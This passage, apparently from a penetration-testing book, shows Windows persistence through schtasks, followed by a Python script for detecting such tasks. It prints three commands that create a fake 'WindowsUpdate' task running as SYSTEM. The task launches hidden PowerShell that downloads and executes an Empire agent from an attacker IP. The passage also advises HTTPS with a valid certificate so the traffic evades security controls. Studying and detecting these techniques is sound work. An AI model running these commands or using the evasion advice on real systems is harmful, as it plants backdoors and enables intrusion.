Using schtasks to configure a persistent task

The Windows Task Scheduler (schtasks) was introduced in Windows XP and Windows Server 2003 as a replacement for at.exe. However, at.exe is still present in current versions of Windows for backward compatibility. In this section, we will use scheduled tasks to maintain persistent access to a compromised system.

Attackers can create a scheduled task on the compromised system that runs the Empire agent payload served from the attacker's machine, which then provides backdoor access. schtasks can be configured directly from the Command Prompt, as shown in the following screenshot:

The following are typical scheduled-task scenarios that attackers use to maintain persistent access to the system:

  • To launch an Empire PowerShell agent during the user login process, run the following command from the command line:
schtasks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.168.0.109:/agent.ps1'))'" /sc onlogon /ru System
  • Similarly, to launch the agent at system start, run the following (the same task with the onstart schedule type):
schtasks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.168.0.109:/agent.ps1'))'" /sc onstart /ru System
  • The following command sets up a task that launches the agent when the system becomes idle (the onidle schedule type):
schtasks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.168.0.109:/agent.ps1'))'" /sc onidle /ru System
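As an added defender-side example (not from the book or the Empire project), the following Python script parses the output of schtasks /query /v /fo CSV and scores every task on the indicators visible in the commands above: PowerShell launched with a hidden window and -ep bypass, IEX combined with a download cradle, a URL pointing at a bare IP address, the task running as SYSTEM on a logon, start or idle trigger, and a task name that mimics Windows Update outside the \Microsoft\ folder. The sample CSV is constructed; it keeps only the columns the check needs (the real verbose output has many more), and the column names and "Schedule Type" strings are assumptions about the CSV format.

```python
import csv
import io
import re

# Constructed sample of `schtasks /query /v /fo CSV` output (assumption: only the
# columns used by the check are kept; the real output has many more columns).
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WS01","\WindowsUpdate","c:\windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c IEX ((new-object net.webclient).downloadstring('http://192.0.2.10/agent.ps1'))","SYSTEM","At logon time"
"WS01","\Microsoft\Windows\UpdateOrchestrator\Schedule Scan","%systemroot%\system32\usoclient.exe StartScan","SYSTEM","At idle time"
"WS01","\Backup\NightlyBackup","C:\Tools\backup.exe /full","WS01\backupsvc","Daily"
'''

# Regex indicators taken from the task action used in the persistence commands.
# Each entry: (pattern, weight, description); matched case-insensitively.
COMMAND_INDICATORS = [
    (r"powershell(\.exe)?", 1, "launches PowerShell"),
    (r"-w(indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-e(xecutionpolicy|p)?\s+bypass", 2, "execution policy bypass"),
    (r"\biex\b|invoke-expression", 3, "evaluates downloaded text as code (IEX)"),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", 3,
     "fetches code over the network"),
    (r"https?://\d{1,3}(?:\.\d{1,3}){3}", 2, "URL points at a bare IP address"),
]

# Trigger types that hand an implant execution at boot, logon or idle time.
PERSISTENCE_TRIGGERS = ("logon", "start", "idle")


def score_task(row):
    """Return (score, reasons) for one parsed row of the schtasks CSV output."""
    command = row.get("Task To Run", "")
    name = row.get("TaskName", "")
    run_as = row.get("Run As User", "")
    sched = row.get("Schedule Type", "")
    score, reasons = 0, []

    for pattern, weight, desc in COMMAND_INDICATORS:
        if re.search(pattern, command, re.IGNORECASE):
            score += weight
            reasons.append(desc)

    # Context (principal, trigger, name) only adds weight when the action itself
    # already looks suspicious; a SYSTEM task on logon is normal by itself.
    if score:
        if run_as.upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
            score += 1
            reasons.append("runs as SYSTEM")
        if any(t in sched.lower() for t in PERSISTENCE_TRIGGERS):
            score += 1
            reasons.append(f"persistence trigger: {sched}")
        if "update" in name.lower() and not name.lower().startswith("\\microsoft\\"):
            score += 2
            reasons.append("name mimics Windows Update outside \\Microsoft\\")
    return score, reasons


def find_suspicious_tasks(csv_text, threshold=5):
    """Parse schtasks CSV text and return tasks at or above threshold, highest score first."""
    reader = csv.DictReader(io.StringIO(csv_text))
    flagged = []
    for row in reader:
        score, reasons = score_task(row)
        if score >= threshold:
            flagged.append({
                "host": row.get("HostName", ""),
                "task": row.get("TaskName", ""),
                "score": score,
                "reasons": reasons,
            })
    return sorted(flagged, key=lambda hit: hit["score"], reverse=True)


if __name__ == "__main__":
    for hit in find_suspicious_tasks(SAMPLE_CSV):
        print(f"[{hit['score']:>2}] {hit['host']} {hit['task']}: " + "; ".join(hit["reasons"]))
```

On a live host the CSV text comes from running schtasks /query /v /fo CSV and feeding its output to find_suspicious_tasks; the weights are a starting point and should be tuned against the tasks that are normal in your own environment.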

Attackers will ensure that the listener is always running and accepting connections. To make it look legitimate on the network, the server needs to be set up with a valid SSL certificate and serve over HTTPS, so that the traffic does not trigger alerts from the internal security controls (the firewall, IPS, or proxy).

The same task can be performed with a single command using the Empire PowerShell module persistence/elevated/schtasks, as shown in the following screenshot:
